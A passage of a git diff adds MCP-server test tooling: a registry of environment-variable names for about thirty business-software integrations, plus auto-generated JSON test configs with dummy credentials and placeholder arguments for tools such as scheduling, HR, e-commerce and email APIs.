? '🟢' : r.score >= 80 ? '🟡' : r.score === null ? '⚪' : '🔴'; + md += `| ${emoji} ${r.name} | ${r.score ?? '-'}/100 | ${r.level} | ${r.issues.join('; ') || 'None'} |\n`; +} + +const mdPath = resolve(REPORTS_DIR, `compliance-${new Date().toISOString().split('T')[0]}.md`); +writeFileSync(mdPath, md); +console.log(`\nReports saved:\n ${reportPath}\n ${mdPath}`); diff --git a/factory-tools/server-registry.json b/factory-tools/server-registry.json new file mode 100644 index 0000000..3c0c66e --- /dev/null +++ b/factory-tools/server-registry.json @@ -0,0 +1,35 @@ +{ + "servers_root": "../mcp-diagrams/mcp-servers", + "servers": { + "acuity-scheduling": { "env": ["ACUITY_API_KEY", "ACUITY_USER_ID"] }, + "bamboohr": { "env": ["BAMBOOHR_API_KEY", "BAMBOOHR_COMPANY_DOMAIN"] }, + "basecamp": { "env": ["BASECAMP_ACCESS_TOKEN", "BASECAMP_ACCOUNT_ID", "BASECAMP_APP_IDENTITY"] }, + "bigcommerce": { "env": ["BIGCOMMERCE_ACCESS_TOKEN", "BIGCOMMERCE_STORE_HASH"] }, + "brevo": { "env": ["BREVO_API_KEY"] }, + "calendly": { "env": ["CALENDLY_API_KEY"] }, + "clickup": { "env": ["CLICKUP_API_KEY"] }, + "close": { "env": ["CLOSE_API_KEY"] }, + "clover": { "env": ["CLOVER_API_KEY", "CLOVER_MERCHANT_ID", "CLOVER_REGION", "CLOVER_SANDBOX"] }, + "constant-contact": { "env": ["CONSTANT_CONTACT_ACCESS_TOKEN"] }, + "fieldedge": { "env": ["FIELDEDGE_API_KEY", "FIELDEDGE_SUBSCRIPTION_KEY"] }, + "freshbooks": { "env": ["FRESHBOOKS_ACCESS_TOKEN", "FRESHBOOKS_ACCOUNT_ID"] }, + "freshdesk": { "env": ["FRESHDESK_API_KEY", "FRESHDESK_DOMAIN"] }, + "gusto": { "env": ["GUSTO_ACCESS_TOKEN"] }, + "helpscout": { "env": ["HELPSCOUT_ACCESS_TOKEN"] }, + "housecall-pro": { "env": ["HOUSECALL_PRO_API_KEY"] }, + "jobber": { "env": ["JOBBER_ACCESS_TOKEN"] }, + "keap": { "env": ["KEAP_ACCESS_TOKEN"] }, + "lightspeed": { "env": ["LIGHTSPEED_ACCESS_TOKEN", "LIGHTSPEED_ACCOUNT_ID"] }, + "mailchimp": { "env": ["MAILCHIMP_API_KEY"] }, + "pipedrive": { "env": ["PIPEDRIVE_API_TOKEN"] }, + "rippling": { "env": ["RIPPLING_API_KEY"] }, + "servicetitan": { "env": ["SERVICETITAN_CLIENT_ID", "SERVICETITAN_CLIENT_SECRET", "SERVICETITAN_TENANT_ID"] }, + "squarespace": { "env": ["SQUARESPACE_API_KEY"] }, + "toast": { "env": ["TOAST_CLIENT_ID", "TOAST_CLIENT_SECRET", "TOAST_RESTAURANT_GUID"] }, + "touchbistro": { "env": ["TOUCHBISTRO_API_KEY", "TOUCHBISTRO_VENUE_ID"] }, + "trello": { "env": ["TRELLO_API_KEY", "TRELLO_TOKEN"] }, + "wave": { "env": ["WAVE_API_TOKEN"] }, + "wrike": { "env": ["WRIKE_ACCESS_TOKEN"] }, + "zendesk": { "env": ["ZENDESK_API_TOKEN", "ZENDESK_EMAIL", "ZENDESK_SUBDOMAIN"] } + } +} diff --git a/factory-tools/test-configs/acuity-scheduling-tests.json b/factory-tools/test-configs/acuity-scheduling-tests.json new file mode 100644 index 0000000..b848bf9 --- /dev/null +++ b/factory-tools/test-configs/acuity-scheduling-tests.json @@ -0,0 +1,174 @@ +{ + "server": { + "command": "node", + "args": [ + "/Users/jakeshore/.clawdbot/workspace/mcp-diagrams/mcp-servers/acuity-scheduling/dist/index.js" + ], + "env": { + "ACUITY_API_KEY": "factory_discovery_dummy", + "ACUITY_USER_ID": "factory_discovery_dummy" + } + }, + "tests": { + "tools": { + "list_appointments": { + "args": { + "minDate": "test_value", + "maxDate": "test_value", + "calendarID": 50, + "appointmentTypeID": 50, + "canceled": true, + "max": 50 + }, + "expect": "content && content.length > 0" + }, + "list_appointments:empty-minDate": { + "args": { + "minDate": "", + "maxDate": "test_value", + "calendarID": 50, + "appointmentTypeID": 50, + "canceled": true, + "max": 50 + }, + "expect": "exists" + }, + "list_appointments:empty-maxDate": { + "args": { + "minDate": "test_value", + "maxDate": "", + "calendarID": 50, + "appointmentTypeID": 50, + "canceled": true, + "max": 50 + }, + "expect": "exists" + }, + "get_appointment": { + "args": { + "id": 50 + }, + "expect": "content && content.length > 0" + }, + "create_appointment": { + "args": { + "datetime": "test_value", + "appointmentTypeID": 50, + "calendarID": 50, + "firstName": "Test Name", + "lastName": "Test Name", + "email": "test@example.com", + "phone": "test_value", + "notes": "test_value", + "fields": [] + }, + "expect": "content && content.length > 0" + }, + "create_appointment:empty-phone": { + "args": { + "datetime": "test_value", + "appointmentTypeID": 50, + "calendarID": 50, + "firstName": "Test Name", + "lastName": "Test Name", + "email": "test@example.com", + "phone": "", + "notes": "test_value", + "fields": [] + }, + "expect": "exists" + }, + "create_appointment:empty-notes": { + "args": { + "datetime": "test_value", + "appointmentTypeID": 50, + "calendarID": 50, + "firstName": "Test Name", + "lastName": "Test Name", + "email": "test@example.com", + "phone": "test_value", + "notes": "", + "fields": [] + }, + "expect": "exists" + }, + "cancel_appointment": { + "args": { + "id": 50, + "cancelNote": "test_value", + "noShow": true + }, + "expect": "content && content.length > 0" + }, + "cancel_appointment:empty-cancelNote": { + "args": { + "id": 50, + "cancelNote": "", + "noShow": true + }, + "expect": "exists" + }, + "list_calendars": { + "args": {}, + "expect": "content && content.length > 0" + }, + "get_availability": { + "args": { + "appointmentTypeID": 50, + "calendarID": 50, + "date": "test_value", + "month": "test_value", + "timezone": "test_value" + }, + "expect": "content && content.length > 0" + }, + "get_availability:empty-date": { + "args": { + "appointmentTypeID": 50, + "calendarID": 50, + "date": "", + "month": "test_value", + "timezone": "test_value" + }, + "expect": "exists" + }, + "get_availability:empty-month": { + "args": { + "appointmentTypeID": 50, + "calendarID": 50, + "date": "test_value", + "month": "", + "timezone": "test_value" + }, + "expect": "exists" + }, + "get_availability:empty-timezone": { + "args": { + "appointmentTypeID": 50, + "calendarID": 50, + "date": "test_value", + "month": "test_value", + "timezone": "" + }, + "expect": "exists" + }, + "list_clients": { + "args": { + "search": "test query", + "max": 50 + }, + "expect": "content && content.length > 0" + }, + "list_clients:empty-search": { + "args": { + "search": "", + "max": 50 + }, + "expect": "exists" + } + }, + "resources": {}, + "prompts": {}, + "timeout": 30000 + } +} \ No newline at end of file diff --git a/factory-tools/test-configs/acuity-scheduling.json b/factory-tools/test-configs/acuity-scheduling.json new file mode 100644 index 0000000..9d4f6ec --- /dev/null +++ b/factory-tools/test-configs/acuity-scheduling.json @@ -0,0 +1,12 @@ +{ + "server": { + "command": "node", + "args": [ + "/Users/jakeshore/.clawdbot/workspace/mcp-diagrams/mcp-servers/acuity-scheduling/dist/index.js" + ], + "env": { + "ACUITY_API_KEY": "factory_discovery_dummy", + "ACUITY_USER_ID": "factory_discovery_dummy" + } + } +} \ No newline at end of file diff --git a/factory-tools/test-configs/bamboohr-tests.json b/factory-tools/test-configs/bamboohr-tests.json new file mode 100644 index 0000000..79a4054 --- /dev/null +++ b/factory-tools/test-configs/bamboohr-tests.json @@ -0,0 +1,113 @@ +{ + "server": { + "command": "node", + "args": [ + "/Users/jakeshore/.clawdbot/workspace/mcp-diagrams/mcp-servers/bamboohr/dist/index.js" + ], + "env": { + "BAMBOOHR_API_KEY": "factory_discovery_dummy", + "BAMBOOHR_COMPANY_DOMAIN": "factory_discovery_dummy" + } + }, + "tests": { + "tools": { + "list_employees": { + "args": {}, + "expect": "content && content.length > 0" + }, + "get_employee": { + "args": { + "employee_id": "test-id-123", + "fields": [] + }, + "expect": "content && content.length > 0" + }, + "list_time_off_requests": { + "args": { + "start": "test_value", + "end": "test_value", + "status": "approved", + "employee_id": "test-id-123" + }, + "expect": "content && content.length > 0" + }, + "list_time_off_requests:empty-start": { + "args": { + "start": "", + "end": "test_value", + "status": "approved", + "employee_id": "test-id-123" + }, + "expect": "exists" + }, + "list_time_off_requests:empty-end": { + "args": { + "start": "test_value", + "end": "", + "status": "approved", + "employee_id": "test-id-123" + }, + "expect": "exists" + }, + "list_time_off_requests:empty-status": { + "args": { + "start": "test_value", + "end": "test_value", + "status": "", + "employee_id": "test-id-123" + }, + "expect": "exists" + }, + "list_time_off_requests:empty-employee_id": { + "args": { + "start": "test_value", + "end": "test_value", + "status": "approved", + "employee_id": "" + }, + "expect": "exists" + }, + "request_time_off": { + "args": { + "employee_id": "test-id-123", + "time_off_type_id": "test-id-123", + "start": "test_value", + "end": "test_value", + "amount": 50, + "notes": "test_value" + }, + "expect": "content && content.length > 0" + }, + "request_time_off:empty-notes": { + "args": { + "employee_id": "test-id-123", + "time_off_type_id": "test-id-123", + "start": "test_value", + "end": "test_value", + "amount": 50, + "notes": "" + }, + "expect": "exists" + }, + "list_goals": { + "args": { + "employee_id": "test-id-123" + }, + "expect": "content && content.length > 0" + }, + "get_directory": { + "args": {}, + "expect": "content && content.length > 0" + }, + "list_files": { + "args": { + "employee_id": "test-id-123" + }, + "expect": "content && content.length > 0" + } + }, + "resources": {}, + "prompts": {}, + "timeout": 30000 + } +} \ No newline at end of file diff --git a/factory-tools/test-configs/bamboohr.json b/factory-tools/test-configs/bamboohr.json new file mode 100644 index 0000000..fc52550 --- /dev/null +++ b/factory-tools/test-configs/bamboohr.json @@ -0,0 +1,12 @@ +{ + "server": { + "command": "node", + "args": [ + "/Users/jakeshore/.clawdbot/workspace/mcp-diagrams/mcp-servers/bamboohr/dist/index.js" + ], + "env": { + "BAMBOOHR_API_KEY": "factory_discovery_dummy", + "BAMBOOHR_COMPANY_DOMAIN": "factory_discovery_dummy" + } + } +} \ No newline at end of file diff --git a/factory-tools/test-configs/basecamp-tests.json b/factory-tools/test-configs/basecamp-tests.json new file mode 100644 index 0000000..88fb5e9 --- /dev/null +++ b/factory-tools/test-configs/basecamp-tests.json @@ -0,0 +1,150 @@ +{ + "server": { + "command": "node", + "args": [ + "/Users/jakeshore/.clawdbot/workspace/mcp-diagrams/mcp-servers/basecamp/dist/index.js" + ], + "env": { + "BASECAMP_ACCESS_TOKEN": "factory_discovery_dummy", + "BASECAMP_ACCOUNT_ID": "factory_discovery_dummy", + "BASECAMP_APP_IDENTITY": "factory_discovery_dummy" + } + }, + "tests": { + "tools": { + "list_projects": { + "args": { + "status": "active" + }, + "expect": "content && content.length > 0" + }, + "list_projects:empty-status": { + "args": { + "status": "" + }, + "expect": "exists" + }, + "get_project": { + "args": { + "project_id": 50 + }, + "expect": "content && content.length > 0" + }, + "list_todos": { + "args": { + "project_id": 50, + "todolist_id": 50, + "status": "active", + "completed": true + }, + "expect": "content && content.length > 0" + }, + "list_todos:empty-status": { + "args": { + "project_id": 50, + "todolist_id": 50, + "status": "", + "completed": true + }, + "expect": "exists" + }, + "create_todo": { + "args": { + "project_id": 50, + "todolist_id": 50, + "content": "Sample content for testing", + "description": "test_value", + "assignee_ids": [], + "due_on": "test_value", + "starts_on": "test_value", + "notify": true + }, + "expect": "content && content.length > 0" + }, + "create_todo:empty-description": { + "args": { + "project_id": 50, + "todolist_id": 50, + "content": "Sample content for testing", + "description": "", + "assignee_ids": [], + "due_on": "test_value", + "starts_on": "test_value", + "notify": true + }, + "expect": "exists" + }, + "create_todo:empty-due_on": { + "args": { + "project_id": 50, + "todolist_id": 50, + "content": "Sample content for testing", + "description": "test_value", + "assignee_ids": [], + "due_on": "", + "starts_on": "test_value", + "notify": true + }, + "expect": "exists" + }, + "create_todo:empty-starts_on": { + "args": { + "project_id": 50, + "todolist_id": 50, + "content": "Sample content for testing", + "description": "test_value", + "assignee_ids": [], + "due_on": "test_value", + "starts_on": "", + "notify": true + }, + "expect": "exists" + }, + "complete_todo": { + "args": { + "project_id": 50, + "todo_id": 50 + }, + "expect": "content && content.length > 0" + }, + "list_messages": { + "args": { + "project_id": 50, + "message_board_id": 50 + }, + "expect": "content && content.length > 0" + }, + "create_message": { + "args": { + "project_id": 50, + "message_board_id": 50, + "subject": "test_value", + "content": "Sample content for testing", + "status": "active", + "category_id": 50 + }, + "expect": "content && content.length > 0" + }, + "create_message:empty-status": { + "args": { + "project_id": 50, + "message_board_id": 50, + "subject": "test_value", + "content": "Sample content for testing", + "status": "", + "category_id": 50 + }, + "expect": "exists" + }, + "list_people": { + "args": { + "project_id": 50 + }, + "expect": "content && content.length > 0" + } + }, + "resources": {}, + "prompts": {}, + "timeout": 30000 + } +} \ No newline at end of file diff --git a/factory-tools/test-configs/basecamp.json b/factory-tools/test-configs/basecamp.json new file mode 100644 index 0000000..65b41e3 --- /dev/null +++ b/factory-tools/test-configs/basecamp.json @@ -0,0 +1,13 @@ +{ + "server": { + "command": "node", + "args": [ + "/Users/jakeshore/.clawdbot/workspace/mcp-diagrams/mcp-servers/basecamp/dist/index.js" + ], + "env": { + "BASECAMP_ACCESS_TOKEN": "factory_discovery_dummy", + "BASECAMP_ACCOUNT_ID": "factory_discovery_dummy", + "BASECAMP_APP_IDENTITY": "factory_discovery_dummy" + } + } +} \ No newline at end of file diff --git a/factory-tools/test-configs/bigcommerce-tests.json b/factory-tools/test-configs/bigcommerce-tests.json new file mode 100644 index 0000000..d2a69d9 --- /dev/null +++ b/factory-tools/test-configs/bigcommerce-tests.json @@ -0,0 +1,462 @@ +{ + "server": { + "command": "node", + "args": [ + "/Users/jakeshore/.clawdbot/workspace/mcp-diagrams/mcp-servers/bigcommerce/dist/index.js" + ], + "env": { + "BIGCOMMERCE_ACCESS_TOKEN": "factory_discovery_dummy", + "BIGCOMMERCE_STORE_HASH": "factory_discovery_dummy" + } + }, + "tests": { + "tools": { + "list_products": { + "args": { + "limit": 50, + "page": 50, + "name": "Test Name", + "sku": "test_value", + "brand_id": 50, + "categories": "test_value", + "is_visible": true, + "availability": "test_value", + "include": "test_value" + }, + "expect": "content && content.length > 0" + }, + "list_products:empty-name": { + "args": { + "limit": 50, + "page": 50, + "name": "", + "sku": "test_value", + "brand_id": 50, + "categories": "test_value", + "is_visible": true, + "availability": "test_value", + "include": "test_value" + }, + "expect": "exists" + }, + "list_products:empty-sku": { + "args": { + "limit": 50, + "page": 50, + "name": "Test Name", + "sku": "", + "brand_id": 50, + "categories": "test_value", + "is_visible": true, + "availability": "test_value", + "include": "test_value" + }, + "expect": "exists" + }, + "list_products:empty-categories": { + "args": { + "limit": 50, + "page": 50, + "name": "Test Name", + "sku": "test_value", + "brand_id": 50, + "categories": "", + "is_visible": true, + "availability": "test_value", + "include": "test_value" + }, + "expect": "exists" + }, + "list_products:empty-availability": { + "args": { + "limit": 50, + "page": 50, + "name": "Test Name", + "sku": "test_value", + "brand_id": 50, + "categories": "test_value", + "is_visible": true, + "availability": "", + "include": "test_value" + }, + "expect": "exists" + }, + "list_products:empty-include": { + "args": { + "limit": 50, + "page": 50, + "name": "Test Name", + "sku": "test_value", + "brand_id": 50, + "categories": "test_value", + "is_visible": true, + "availability": "test_value", + "include": "" + }, + "expect": "exists" + }, + "get_product": { + "args": { + "product_id": 50, + "include": "test_value" + }, + "expect": "content && content.length > 0" + }, + "get_product:empty-include": { + "args": { + "product_id": 50, + "include": "" + }, + "expect": "exists" + }, + "create_product": { + "args": { + "name": "Test Name", + "type": "test_value", + "weight": 50, + "price": 50, + "sku": "test_value", + "description": "test_value", + "categories": [], + "brand_id": 50, + "inventory_level": 50, + "inventory_tracking": "test_value", + "is_visible": true, + "availability": "test_value", + "cost_price": 50, + "sale_price": 50 + }, + "expect": "content && content.length > 0" + }, + "create_product:empty-sku": { + "args": { + "name": "Test Name", + "type": "test_value", + "weight": 50, + "price": 50, + "sku": "", + "description": "test_value", + "categories": [], + "brand_id": 50, + "inventory_level": 50, + "inventory_tracking": "test_value", + "is_visible": true, + "availability": "test_value", + "cost_price": 50, + "sale_price": 50 + }, + "expect": "exists" + }, + "create_product:empty-description": { + "args": { + "name": "Test Name", + "type": "test_value", + "weight": 50, + "price": 50, + "sku": "test_value", + "description": "", + "categories": [], + "brand_id": 50, + "inventory_level": 50, + "inventory_tracking": "test_value", + "is_visible": true, + "availability": "test_value", + "cost_price": 50, + "sale_price": 50 + }, + "expect": "exists" + }, + "create_product:empty-inventory_tracking": { + "args": { + "name": "Test Name", + "type": "test_value", + "weight": 50, + "price": 50, + "sku": "test_value", + "description": "test_value", + "categories": [], + "brand_id": 50, + "inventory_level": 50, + "inventory_tracking": "", + "is_visible": true, + "availability": "test_value", + "cost_price": 50, + "sale_price": 50 + }, + "expect": "exists" + }, + "create_product:empty-availability": { + "args": { + "name": "Test Name", + "type": "test_value", + "weight": 50, + "price": 50, + "sku": "test_value", + "description": "test_value", + "categories": [], + "brand_id": 50, + "inventory_level": 50, + "inventory_tracking": "test_value", + "is_visible": true, + "availability": "", + "cost_price": 50, + "sale_price": 50 + }, + "expect": "exists" + }, + "update_product": { + "args": { + "product_id": 50, + "name": "Test Name", + "price": 50, + "sku": "test_value", + "description": "test_value", + "categories": [], + "inventory_level": 50, + "is_visible": true, + "availability": "test_value", + "sale_price": 50 + }, + "expect": "content && content.length > 0" + }, + "update_product:empty-name": { + "args": { + "product_id": 50, + "name": "", + "price": 50, + "sku": "test_value", + "description": "test_value", + "categories": [], + "inventory_level": 50, + "is_visible": true, + "availability": "test_value", + "sale_price": 50 + }, + "expect": "exists" + }, + "update_product:empty-sku": { + "args": { + "product_id": 50, + "name": "Test Name", + "price": 50, + "sku": "", + "description": "test_value", + "categories": [], + "inventory_level": 50, + "is_visible": true, + "availability": "test_value", + "sale_price": 50 + }, + "expect": "exists" + }, + "update_product:empty-description": { + "args": { + "product_id": 50, + "name": "Test Name", + "price": 50, + "sku": "test_value", + "description": "", + "categories": [], + "inventory_level": 50, + "is_visible": true, + "availability": "test_value", + "sale_price": 50 + }, + "expect": "exists" + }, + "update_product:empty-availability": { + "args": { + "product_id": 50, + "name": "Test Name", + "price": 50, + "sku": "test_value", + "description": "test_value", + "categories": [], + "inventory_level": 50, + "is_visible": true, + "availability": "", + "sale_price": 50 + }, + "expect": "exists" + }, + "list_orders": { + "args": { + "limit": 50, + "page": 50, + "min_date_created": "test_value", + "max_date_created": "test_value", + "status_id": 50, + "customer_id": 50, + "min_total": 50, + "max_total": 50, + "is_deleted": true, + "sort": "test_value" + }, + "expect": "content && content.length > 0" + }, + "list_orders:empty-min_date_created": { + "args": { + "limit": 50, + "page": 50, + "min_date_created": "", + "max_date_created": "test_value", + "status_id": 50, + "customer_id": 50, + "min_total": 50, + "max_total": 50, + "is_deleted": true, + "sort": "test_value" + }, + "expect": "exists" + }, + "list_orders:empty-max_date_created": { + "args": { + "limit": 50, + "page": 50, + "min_date_created": "test_value", + "max_date_created": "", + "status_id": 50, + "customer_id": 50, + "min_total": 50, + "max_total": 50, + "is_deleted": true, + "sort": "test_value" + }, + "expect": "exists" + }, + "list_orders:empty-sort": { + "args": { + "limit": 50, + "page": 50, + "min_date_created": "test_value", + "max_date_created": "test_value", + "status_id": 50, + "customer_id": 50, + "min_total": 50, + "max_total": 50, + "is_deleted": true, + "sort": "" + }, + "expect": "exists" + }, + "get_order": { + "args": { + "order_id": 50, + "include_products": true, + "include_shipping": true + }, + "expect": "content && content.length > 0" + }, + "list_customers": { + "args": { + "limit": 50, + "page": 50, + "email": "test@example.com", + "name": "Test Name", + "company": "test_value", + "customer_group_id": 50, + "date_created_min": "test_value", + "date_created_max": "test_value", + "include": "test_value" + }, + "expect": "content && content.length > 0" + }, + "list_customers:empty-email": { + "args": { + "limit": 50, + "page": 50, + "email": "", + "name": "Test Name", + "company": "test_value", + "customer_group_id": 50, + "date_created_min": "test_value", + "date_created_max": "test_value", + "include": "test_value" + }, + "expect": "exists" + }, + "list_customers:empty-name": { + "args": { + "limit": 50, + "page": 50, + "email": "test@example.com", + "name": "", + "company": "test_value", + "customer_group_id": 50, + "date_created_min": "test_value", + "date_created_max": "test_value", + "include": "test_value" + }, + "expect": "exists" + }, + "list_customers:empty-company": { + "args": { + "limit": 50, + "page": 50, + "email": "test@example.com", + "name": "Test Name", + "company": "", + "customer_group_id": 50, + "date_created_min": "test_value", + "date_created_max": "test_value", + "include": "test_value" + }, + "expect": "exists" + }, + "list_customers:empty-date_created_min": { + "args": { + "limit": 50, + "page": 50, + "email": "test@example.com", + "name": "Test Name", + "company": "test_value", + "customer_group_id": 50, + "date_created_min": "", + "date_created_max": "test_value", + "include": "test_value" + }, + "expect": "exists" + }, + "list_customers:empty-date_created_max": { + "args": { + "limit": 50, + "page": 50, + "email": "test@example.com", + "name": "Test Name", + "company": "test_value", + "customer_group_id": 50, + "date_created_min": "test_value", + "date_created_max": "", + "include": "test_value" + }, + "expect": "exists" + }, + "list_customers:empty-include": { + "args": { + "limit": 50, + "page": 50, + "email": "test@example.com", + "name": "Test Name", + "company": "test_value", + "customer_group_id": 50, + "date_created_min": "test_value", + "date_created_max": "test_value", + "include": "" + }, + "expect": "exists" + }, + "update_inventory": { + "args": { + "product_id": 50, + "variant_id": 50, + "inventory_level": 50, + "inventory_warning_level": 50 + }, + "expect": "content && content.length > 0" + } + }, + "resources": {}, + "prompts": {}, + "timeout": 30000 + } +} \ No newline at end of file diff --git a/factory-tools/test-configs/bigcommerce.json b/factory-tools/test-configs/bigcommerce.json new file mode 100644 index 0000000..85a6b8a --- /dev/null +++ b/factory-tools/test-configs/bigcommerce.json @@ -0,0 +1,12 @@ +{ + "server": { + "command": "node", + "args": [ + "/Users/jakeshore/.clawdbot/workspace/mcp-diagrams/mcp-servers/bigcommerce/dist/index.js" + ], + "env": { + "BIGCOMMERCE_ACCESS_TOKEN": "factory_discovery_dummy", + "BIGCOMMERCE_STORE_HASH": "factory_discovery_dummy" + } + } +} \ No newline at end of file diff --git a/factory-tools/test-configs/brevo-tests.json b/factory-tools/test-configs/brevo-tests.json new file mode 100644 index 0000000..91c5b86 --- /dev/null +++ b/factory-tools/test-configs/brevo-tests.json @@ -0,0 +1,318 @@ +{ + "server": { + "command": "node", + "args": [ + "/Users/jakeshore/.clawdbot/workspace/mcp-diagrams/mcp-servers/brevo/dist/index.js" + ], + "env": { + "BREVO_API_KEY": "factory_discovery_dummy" + } + }, + "tests": { + "tools": { + "send_email": { + "args": { + "to": [], + "sender": {}, + "subject": "test_value", + "htmlContent": "Sample content for testing", + "textContent": "Sample content for testing", + "templateId": 50, + "params": {}, + "replyTo": {}, + "attachment": [], + "tags": [] + }, + "expect": "content && content.length > 0" + }, + "send_email:empty-subject": { + "args": { + "to": [], + "sender": {}, + "subject": "", + "htmlContent": "Sample content for testing", + "textContent": "Sample content for testing", + "templateId": 50, + "params": {}, + "replyTo": {}, + "attachment": [], + "tags": [] + }, + "expect": "exists" + }, + "send_email:empty-htmlContent": { + "args": { + "to": [], + "sender": {}, + "subject": "test_value", + "htmlContent": "", + "textContent": "Sample content for testing", + "templateId": 50, + "params": {}, + "replyTo": {}, + "attachment": [], + "tags": [] + }, + "expect": "exists" + }, + "send_email:empty-textContent": { + "args": { + "to": [], + "sender": {}, + "subject": "test_value", + "htmlContent": "Sample content for testing", + "textContent": "", + "templateId": 50, + "params": {}, + "replyTo": {}, + "attachment": [], + "tags": [] + }, + "expect": "exists" + }, + "list_contacts": { + "args": { + "limit": 50, + "offset": 50, + "modifiedSince": "test_value", + "sort": "test_value" + }, + "expect": "content && content.length > 0" + }, + "list_contacts:empty-modifiedSince": { + "args": { + "limit": 50, + "offset": 50, + "modifiedSince": "", + "sort": "test_value" + }, + "expect": "exists" + }, + "list_contacts:empty-sort": { + "args": { + "limit": 50, + "offset": 50, + "modifiedSince": "test_value", + "sort": "" + }, + "expect": "exists" + }, + "add_contact": { + "args": { + "email": "test@example.com", + "attributes": {}, + "listIds": [], + "updateEnabled": true, + "smtpBlacklistSender": [] + }, + "expect": "content && content.length > 0" + }, + "update_contact": { + "args": { + "identifier": "test-id-123", + "attributes": {}, + "listIds": [], + "unlinkListIds": [], + "emailBlacklisted": true, + "smsBlacklisted": true + }, + "expect": "content && content.length > 0" + }, + "list_campaigns": { + "args": { + "type": "test_value", + "status": "test_value", + "limit": 50, + "offset": 50, + "sort": "test_value" + }, + "expect": "content && content.length > 0" + }, + "list_campaigns:empty-type": { + "args": { + "type": "", + "status": "test_value", + "limit": 50, + "offset": 50, + "sort": "test_value" + }, + "expect": "exists" + }, + "list_campaigns:empty-status": { + "args": { + "type": "test_value", + "status": "", + "limit": 50, + "offset": 50, + "sort": "test_value" + }, + "expect": "exists" + }, + "list_campaigns:empty-sort": { + "args": { + "type": "test_value", + "status": "test_value", + "limit": 50, + "offset": 50, + "sort": "" + }, + "expect": "exists" + }, + "create_campaign": { + "args": { + "name": "Test Name", + "subject": "test_value", + "sender": {}, + "htmlContent": "Sample content for testing", + "templateId": 50, + "recipients": {}, + "scheduledAt": "test_value", + "replyTo": "test_value", + "toField": "test_value", + "tag": "test_value" + }, + "expect": "content && content.length > 0" + }, + "create_campaign:empty-htmlContent": { + "args": { + "name": "Test Name", + "subject": "test_value", + "sender": {}, + "htmlContent": "", + "templateId": 50, + "recipients": {}, + "scheduledAt": "test_value", + "replyTo": "test_value", + "toField": "test_value", + "tag": "test_value" + }, + "expect": "exists" + }, + "create_campaign:empty-scheduledAt": { + "args": { + "name": "Test Name", + "subject": "test_value", + "sender": {}, + "htmlContent": "Sample content for testing", + "templateId": 50, + "recipients": {}, + "scheduledAt": "", + "replyTo": "test_value", + "toField": "test_value", + "tag": "test_value" + }, + "expect": "exists" + }, + "create_campaign:empty-replyTo": { + "args": { + "name": "Test Name", + "subject": "test_value", + "sender": {}, + "htmlContent": "Sample content for testing", + "templateId": 50, + "recipients": {}, + "scheduledAt": "test_value", + "replyTo": "", + "toField": "test_value", + "tag": "test_value" + }, + "expect": "exists" + }, + "create_campaign:empty-toField": { + "args": { + "name": "Test Name", + "subject": "test_value", + "sender": {}, + "htmlContent": "Sample content for testing", + "templateId": 50, + "recipients": {}, + "scheduledAt": "test_value", + "replyTo": "test_value", + "toField": "", + "tag": "test_value" + }, + "expect": "exists" + }, + "create_campaign:empty-tag": { + "args": { + "name": "Test Name", + "subject": "test_value", + "sender": {}, + "htmlContent": "Sample content for testing", + "templateId": 50, + "recipients": {}, + "scheduledAt": "test_value", + "replyTo": "test_value", + "toField": "test_value", + "tag": "" + }, + "expect": "exists" + }, + "send_sms": { + "args": { + "sender": "test_value", + "recipient": "test_value", + "content": "Sample content for testing", + "type": "test_value", + "tag": "test_value", + "webUrl": "https://example.com" + }, + "expect": "content && content.length > 0" + }, + "send_sms:empty-type": { + "args": { + "sender": "test_value", + "recipient": "test_value", + "content": "Sample content for testing", + "type": "", + "tag": "test_value", + "webUrl": "https://example.com" + }, + "expect": "exists" + }, + "send_sms:empty-tag": { + "args": { + "sender": "test_value", + "recipient": "test_value", + "content": "Sample content for testing", + "type": "test_value", + "tag": "", + "webUrl": "https://example.com" + }, + "expect": "exists" + }, + "send_sms:empty-webUrl": { + "args": { + "sender": "test_value", + "recipient": "test_value", + "content": "Sample content for testing", + "type": "test_value", + "tag": "test_value", + "webUrl": "" + }, + "expect": "exists" + }, + "list_templates": { + "args": { + "templateStatus": true, + "limit": 50, + "offset": 50, + "sort": "test_value" + }, + "expect": "content && content.length > 0" + }, + "list_templates:empty-sort": { + "args": { + "templateStatus": true, + "limit": 50, + "offset": 50, + "sort": "" + }, + "expect": "exists" + } + }, + "resources": {}, + "prompts": {}, + "timeout": 30000 + } +} \ No newline at end of file diff --git a/factory-tools/test-configs/brevo.json b/factory-tools/test-configs/brevo.json new file mode 100644 index 0000000..ab3f9e8 --- /dev/null +++ b/factory-tools/test-configs/brevo.json @@ -0,0 +1,11 @@ +{ + "server": { + "command": "node", + "args": [ + "/Users/jakeshore/.clawdbot/workspace/mcp-diagrams/mcp-servers/brevo/dist/index.js" + ], + "env": { + "BREVO_API_KEY": "factory_discovery_dummy" + } + } +} \ No newline at end of file diff --git a/factory-tools/test-configs/calendly-tests.json b/factory-tools/test-configs/calendly-tests.json new file mode 100644 index 0000000..460cea7 --- /dev/null +++ b/factory-tools/test-configs/calendly-tests.json @@ -0,0 +1,143 @@ +{ + "server": { + "command": "node", + "args": [ + "/Users/jakeshore/.clawdbot/workspace/mcp-diagrams/mcp-servers/calendly/dist/index.js" + ], + "env": { + "CALENDLY_API_KEY": "factory_discovery_dummy" + } + }, + "tests": { + "tools": { + "list_events": { + "args": { + "count": 50, + "min_start_time": "test_value", + "max_start_time": "test_value", + "status": "active", + "page_token": "test_value" + }, + "expect": "content && content.length > 0" + }, + "list_events:empty-min_start_time": { + "args": { + "count": 50, + "min_start_time": "", + "max_start_time": "test_value", + "status": "active", + "page_token": "test_value" + }, + "expect": "exists" + }, + "list_events:empty-max_start_time": { + "args": { + "count": 50, + "min_start_time": "test_value", + "max_start_time": "", + "status": "active", + "page_token": "test_value" + }, + "expect": "exists" + }, + "list_events:empty-status": { + "args": { + "count": 50, + "min_start_time": "test_value", + "max_start_time": "test_value", + "status": "", + "page_token": "test_value" + }, + "expect": "exists" + }, + "list_events:empty-page_token": { + "args": { + "count": 50, + "min_start_time": "test_value", + "max_start_time": "test_value", + "status": "active", + "page_token": "" + }, + "expect": "exists" + }, + "get_event": { + "args": { + "event_uuid": "test-id-123" + }, + "expect": "content && content.length > 0" + }, + "cancel_event": { + "args": { + "event_uuid": "test-id-123", + "reason": "test_value" + }, + "expect": "content && content.length > 0" + }, + "cancel_event:empty-reason": { + "args": { + "event_uuid": "test-id-123", + "reason": "" + }, + "expect": "exists" + }, + "list_event_types": { + "args": { + "count": 50, + "active": true, + "page_token": "test_value" + }, + "expect": "content && content.length > 0" + }, + 